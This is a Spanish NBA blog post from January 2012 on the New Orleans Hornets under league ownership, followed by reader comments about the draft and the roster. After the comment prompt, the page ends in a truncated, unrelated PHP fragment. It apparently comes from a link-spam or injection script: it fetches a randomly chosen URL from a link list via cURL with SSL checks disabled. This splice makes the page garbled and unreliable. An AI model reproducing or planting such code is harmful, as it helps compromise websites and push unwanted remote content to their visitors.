New Orleans Hornets: En manos de David (Stern)

10 de January de 2012 por TheDeerHunter

Conflicto de intereses. Ya lo avisó Phil Jackson hace algún tiempo.

Estamos ante un caso único y excepcional en el que los propietarios de esta franquicia son a la vez sus rivales y los jueces que velan por la competición son a su vez parte interesada. No produce un ápice de sonrojo que unos y otros se permitan actuar en su contra. Se trata, por tanto, de una franquicia intervenida. Una simple filial del resto. El simple paria que únicamente puede aspirar a recibir las migajas que otros dejen caer mientras barajan su destino. Sin independencia ejecutiva resulta un poco ridículo considerarla como un contendiente más. Se trata de una partida de poker en la que todos le ven las cartas. Su objetivo/condena va a ser vagar sin rumbo durante un tiempo. Con toda probabilidad lo cumplirá. Hasta que recupere la autonomía la liga está coja y adulterada.

Dell Demps es el nombre del muñeco de paja que figura como general manager. Todo ficticio, por supuesto. En la práctica se trata de un personaje que no posee ninguna capacidad de decisión en absoluto. Si, por ejemplo, el hombre tratara de ganarse el impresionante sueldo que le pagan tomando decisiones supuestamente asociadas a su carg,o sus dueños y rivales no dudarían en tirárselas por tierra públicamente. Conviene, por lo tanto, que moleste lo mínimo posible, que se dedique a temas tan productivos como jugar al buscaminas y que, nunca, nunca se olvide de pedir permiso hasta para ir al baño.

Cuán ilusos éramos, señores, cuando al inicio del curso pasado titulábamos nuestro análisis “Convenciendo a Chris”. Tanto Chris Paul como David West conocían el panorama de primera mano. Cualquier agente libre que tenga un mínimo de dignidad y ambición huirá del lugar en cuanto tenga ocasión. Al tiempo. No había ni una sola posibilidad como tampoco intención de convencer a nadie. Obviamente la decisión del jugador bien pudo haber sido algo así: “Traspasadme o no, me es indiferente. No pienso renovar aquí ni aunque mi vida dependiera de ello”. Y, seamos serios, a pocos propietarios les interesaría afrontar un contrato de esa categoría.

Con todo se trata de una franquicia en venta. Tal y como están las cosas no conviene agravar la situación exponiendo un conjunto de activos inservibles. Con el objetivo de maquillar la plantilla no podemos decir que la venta de su máxima estrella haya sido negativa, sino más bien al contrario. Eso sí, siempre ha habido que tener en mente que ha sido en todo momento dirigida, con posibilidad de veto en el horizonte y para cumplir con el triste objetivo de vagar por la competición sin molestar a sus dueños e intentando no parecer una banda. A uno le fascina la posibilidad de que Chris Paul se hubiera cerrado en banda con una postura abierta del estilo de “Pienso firmar por los Knicks el próximo verano por mis santas narices… y a quien no le guste que se fastidie”. Bajo mi punto de vista hubiera sido un acto de justicia casi divina. La consecuencia es que a ver qué es lo que hubieran sido capaces de ofrecer por él. Seguramente poco.

En este contexto puedo decir que el análisis de la plantilla es el que más pereza me produce de los que me haya enfrentado nunca y no es por culpa de la calidad de la misma.

Liderando este nuevo proyecto, la joya imprescindible que desbloqueó la situación es Eric Gordon. Se trata de uno de los anotadores con mayor proyección pero no se caracteriza por una indiscutible regularidad en cuanto a partidos disputados se refiere. Exceptuando su primera temporada acumula una media próxima a 60 y no sabemos si podría hacer un esfuerzo de superarla llegado el caso, teniendo en cuenta la motivación ante los objetivos que le aguardan. De momento no ha comenzado con buen pie.

En los partidos que falle la estrella, el puesto lo tienen correctamente cubierto con Marco Belinelli, buen anotador, y Jarrett Jack que si bien es el base titular puede aportar como buen combo-guard que es. Además dispone de los jóvenes Greivis Vazquez y Xavier Henry.

La posición de 3 es uno de sus puntos flacos, al menos mientras Al-Farouq Aminu o DaJuan Summers no se destapen como lo que algunos vieron en ellos en su etapa universitaria. Mientras tanto conviene soñar con que Trevor Ariza recupere sus sensacionesde L.A. Mucho me temo que esto último es inalcanzable.

Por dentro no van mal servidos. La incorporación de Chris Kaman será un lujo si su salud se lo permite (que será más o menos cuando los sapos bailen flamenco) sumando a un correcto juego interior formado por Emeka Okafor y Carl Landry. Jason Smith y Gustavo Ayón cierran una plantilla que no desata pasiones.

Quinteto: Jarrett Jack, Eric Gordon, Trevor Ariza, Carl Landry, Chris Kaman
6º Hombre: Emeka Okafor

Pronóstico: Indiferente (lotería)

Comenta

22 comentarios a esta entrada

  1. alejandro89 dice:
    #1

    hay algo de esperanza para esta franquicia,tienen a eric gordon un jugador de futuro a farouq aminu que tambien tiene margen de mejora y si no me equivoco una ronda de draft alta para este año que pueden seleccionar a un jugador en el draft interior de calidad

      Citar

  2. TheDeerHunter dice:
    #2

    El jugador de futuro al que te refieres tiene de futuro hasta el 2013 (sino logra pirarse antes)
    En ese 2013 cuando tenga que renovar los Hornets tienen comprometidos un pastizal tremendo en Okafor, el de Ariza bastante significativo (ambos jugadores por debajo de lo que se podría esperar de ellos) y los contratos de Aminu, Vasquez y Xavier Henry, 3 jugadores que son incógnitas.

    Sinceramente apostaría que Gordon es un jugador de 1 temporada de futuro. Si explota se pirará… y mientras la situación de esta franquicia sea la que es ahora apuesto a que en el mejor de los casos podrían soñar con entrar en postemporada. Hasta eso dudo que vayan a hacer alguna vez.

      Citar

  3. Viva_Dirk dice:
    #3

    Como bien dice Deer es una pena la situación de la franquicia, si la venden tienen buenos mimbres para hacer un equipo de calidad, ya que un top5 del draft unido a lo que ya tiene la plantilla es mucho con lo que jugar.

      Citar

  4. melo15 dice:
    #4

    Pues yo creo que este equipo es uno de los mejores en proyeccion, porque a parte de la eleccion de los wolves tienen la suya, eso quiere decir que tendran a dos jugadores problamente con mucho potencial. I todos sabemos que el proximo Draft seramuy bieno, algunos lo comparan con el del 2003 no hace falta decir nada mas

      Citar

  5. nach dice:
    #5

    melo15:
    Pues yo creo que este equipo es uno de los mejores en proyeccion, porque a parte de la eleccion de los wolves tienen la suya, eso quiere decir que tendran a dos jugadores problamente con mucho potencial. I todos sabemos que el proximo Draft seramuy bieno, algunos lo comparan con el del 2003 no hace falta decir nada mas

    Lo de que el draft vaya a ser bueno o malo a mí no me dice nada:
    Ginobili -> 57º del draft
    Parker -> 28º
    Arenas -> 31º
    Boozer -> 34º
    Marc Gasol -> 48º

    Y pufos que teóricamente iban a ser cracks hay muchos más

      Citar

  6. portu dice:
    #6

    Hablando únicamente del tema baloncestítico a mi la plantilla no me disgusta, el juego interior es de lo mejorcito, 3 tíos muy complementarios, con roles diferentes y q pueden compartir bien los minutos con cualquier combinación entre ellos… en los últimos partidos el quinteto titular es con la dupla Kaman-Okafor, mucha altura, defensa, intimidación y calidad en ataque si los combinamos. Por fuera van cojos en la posición de base, pero Jack con minutos cumple bien, Vasquez tiene cositas de buen jugador y luego pues el nivel q les aporte Gordon es lo q les debe dar el salto de calidad, no me parecería descabellado q optasen a la última plaza de playoffs.
    En cuanto a futuro, pues si cierran su venta pronto, con un GM decente pueden encontrarse con un equipito majete con sus dos rondas del año q viene si eligen bien o si obtienen algo interesante por Kaman u Okafor, sobretodo por éste último, ahora q tan de moda están los centers defensivos al estilo T. Chandler.

      Citar

  7. Viva_Dirk dice:
    #7

    nach: Lo de que el draft vaya a ser bueno o malo a mí no me dice nada:
    Ginobili -> 57º del draft
    Parker -> 28º
    Arenas -> 31º
    Boozer -> 34º
    Marc Gasol -> 48º

    Y pufos que teóricamente iban a ser cracks hay muchos más

    Hombre Nach no te calientes, que un draft sea bueno o malo tiene que decirte algo, sobre todo si hay 2 elecciones top5.

    De un draft bueno en un top ten salen Lebron, Wade, Melo, Bosh o Rose, Love, Gordon, Westbrook y Lopez.

    Si es de menos nivel salen Stromile Swift, Darius Miles, Chris Mihm, DerMarr Johnson o Adam Morrison, Shelden Williams, Saer Sene y O’Bryant.

    Acertar en posiciones finales de 1ª ronda o en la segunda depende de varias cosas, pero si en el draft de 2012 tienes 2 elecciones de top5 tienes muy dificil no pillar un All-Star para muchos años.

      Citar

  8. esteban dice:
    #8

    Estoy de acuerdo con aquellos q no les desagrada tanto e equipo, kaman sano es un all star, uno de los centros mas completos de la liga, ojo dije sano y de a momento lo esta, se gano la titularidad y anoche le clavo 20 a los nuggets para una victoria con solo 11 jugadores disponibles por lesion

    Aminu arranco para fiasco pero la lesion de ariza lo mando de titular y vaya si ha respondido, no creo que salga de esa alineacion, sencillamente la rompio los ultimos dos partidos

    Hay q sumar. Progreso enorme de jack y bellineni, dos jugadores de enormes temporada,

    Hay q sumar a gordon a quien pueden renovar por ser reesrtringido y puede ser la cara de la franquicia

    Sus problemas, mas alla de sus dueños son dos.

    Primero, la indesicion, creo q tienen potencial para entrar a PO, pero no mucho mas, al intentar cvender la franquicia quiza les convenga ganar partidos, aunque lo q este equipo necesitaria es su seleccion de draft bien alta, mas la de minesota, con lo q tienen, ya habrian terminado la reconstruccion

    Segundo, los contratos de ariza y okafor, dignos de un equipo desespewrado por un titulo mas q de uno q intenta volver a empezar, destinos? No se, se me ocurre la exepcion q tienen los lakers por ariza, en LA necesitan un alerop q sea mejor q barnes y ariza lo es, ademas de un buen dfefensor, por okafor? el año entrante habra muchos equipos con espacio para ofrecer exepciones por un buen poivot defensivo, todos iran por howard pero solo uno se lo quedara, por lo tanto los mavs, boston, los nets, wizards incluso minesota podrian ofrecer su espacio para hacerse de oklafor

      Citar

  9. Blade Petrovic dice:
    #9

    nach: Lo de que el draft vaya a ser bueno o malo a mí no me dice nada:
    Ginobili -> 57º del draft
    Parker -> 28º
    Arenas -> 31º
    Boozer -> 34º
    Marc Gasol -> 48º

    Te falta George Gervin N 2 de ese draft un tal Marvin Barnes solo bueno en la ABA
    Y el gran Drazen Petrovic numero 60 del 86 Len Bias el 2 y un tal Chris Washburn el tres
    En mi opinion tener una eleccion alta en el draft no garantiza nada que se lo digan a los Clippers de A:G (antes de Griffin)

    Y pufos que teóricamente iban a ser cracks hay muchos más

      Citar

  10. melo15 dice:
    #10

    Pero en la ESPN dicen que va a ser la hostia (perdon) tu leete algunos de esos articulos que hacen en la ESPN y ve algun partido y flipas, esta el hijo de Doc Rivers que es el amo!!

      Citar

  11. melo15 dice:
    #11

    Pero en la ESPN dicen que va a ser la hostia (perdon) tu leete algunos de esos articulos que hacen en la ESPN y ve algun partido y flipas, esta el hijo de Doc Rivers que es el amo!!
    El Draft de 2003 es el mejor de la decada con la gorra y uno de los mejores de la historia solo superado por el de 1984 y el de Kobe, Nash y compañia

      Citar

  12. Blade Petrovic dice:
    #12

    Si pero el del 2003 era mui bueno pero hay callos como Milicic Hinrich i en el 96 un tal lorenz wright y otros

      Citar

  13. esteban dice:
    #13

    Sobre los mejores drafts, es algo opinable, hay draft q tienen enorme talento en los primeros 5 puestos y el resto apenas han jugado en la NBA y otros donde hay menos estrellas pero la lista de jugadores productivos y con carrera NBA se estira hasta segunda ronda

    Sin duda el 03 es de lo mejor q se ha visto, pero el de el año pasado puede ser algop artipico, sin estrellas practicamente, salvo el salto q pueda dar irvig, pero con jugadored utiles de selecciones muy bajas, tales como shumpert, brooks, cole, lo q de monteajunas, herrelson, etc,

    Para los equipos competitivos y ganadores q entran a PO este puede ser un draft muy util, me estoy olvidando del rookie de los bucks, otro segunda ronda, el base de los lakers quien creo q tiene futuro, ni hablar si singletton y selby terminan encajando como parece, y son selecciones todas bajas, mas de mirotic puesto 25 para los bulls, etc

      Citar

  14. Sancho88 dice:
    #14

    Me parece que el tema velado del ‘lockout’ ha sido el de reducción de franquicias. Este negocio es insostenible ahora mismo. Deberían dejarlo en 24-25 equipos, porque estamos viendo en los análisis la barbaridad de equipos en transición, sin objetivos claros a corto-medio plazo, y dependientes de algún milagro en forma de lotería. Comparto lo que dice Nach. El draft todos sabemos lo que es, y a no ser que te pilles a un figurón tipo Kevin Durant o Derrick Rose, entre el resto puede pasar de todo. Y si no, decidme qué equipo ha acertado más con su draft? Para mí Miami, que tendría dos o tres bolitas en el sorteo para el número 1. Harris y Cole están demostrando un saber estar y un aprendizaje que no se puede decir de casi ninguna pareja de primera y segunda ronda este año. Si acaso, Ricky-Williams pueden ser un caso parecido, pero vamos, que lo de la lotería del draft es precisamente eso, una lotería. Sobre NOLA, es una pensa que esté intervenido el equipo, porque Paul les había consolidado en el Top-5 del Oeste durante sus años en la liga, y ahora es un bluff. Dos opciones, o desaparecen, o si no van a ser el títere del que estáis hablando, un equipo al que nadie va a querer ir, o peor aún, en el que se van a exhibir jugadores de estos con proyección a ver si les ficha cualquier otro equipo. Es que para esto, ponemos a los Harlem Globbe Trotters y punto. Muy triste lo que han hecho con los Hornets. Probablemente, el equipo más maltratado en la última década

      Citar

  15. Sancho88 dice:
    #15

    melo15:
    Pero en la ESPN dicen que va a ser la hostia (perdon) tu leete algunos de esos articulos que hacen en la ESPN y ve algun partido y flipas, esta el hijo de Doc Rivers que es el amo!!
    El Draft de 2003 es el mejor de la decada con la gorra y uno de los mejores de la historia solo superado por el de 1984 y el de Kobe, Nash y compañia

    Querras decir Jordan. xd

      Citar

  16. esteban dice:
    #16

    Creo q quiso decir, el de 84 por un lado y el draft de kobe y nash por otro

      Citar

  17. melo15 dice:
    #17

    Claro.
    Esteban en el del 84 habia un tal Sam Bowie que fue el num.2 , veis cono Jordan y Melo tiene parecidos los dos seleccionados en la posicion 3 y superados por dos pivots malisimos
    INCREIBLE!!!

      Citar

  18. esteban dice:
    #18

    Jeje es cierto, aunque creo q bowie era mucho mejor q milicic, por mas q este ahora sea titular en un equipo nba, y tamb creo q melo debio ser rookie del año como jordan

      Citar

  19. Pop dice:
    #19

    melo15: Claro.Esteban en el del 84 habia un tal Sam Bowie que fue el num.2 , veis cono Jordan y Melo tiene parecidos los dos seleccionados en la posicion 3 y superados por dos pivots malisimosINCREIBLE!!!

    Melo, de cara a la pared, deja el móvil, y piensa acerca de lo que has dicho sobre Hakeem Olajuwon.

      Citar

  20. Pop dice:
    #20

    Vale, ahora lo pillo, te refieres a Milicic Y Bowie. Creias que decías que a Jordan le superaron 2 pívots malísimos.

    Te retiro el castigo, Melo. Pero no te relajes xD.

      Citar

  21. inad23 dice:
    #21

    ¿Cuantas veces hemos oido la tipica frase de: “Este draft va a ser buenisimo,va a ser mejor que el del 2003…., que va a ser mejor que el del 84….”? xDDD Es muy facil ilusionarte pensando que “tu” draft va ser la hostia…

      Citar

  22. melo15 dice:
    #22

    Gracias por el apoto Esteban!!!
    Ya pero este draft tiene mas probabilidades de ser buenos porque hubo muchos jugadores cono Jared Sullinger y Harrison Barnes que iban a ser Top 5 del anterior y se quedaron por miedo a lock-out

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>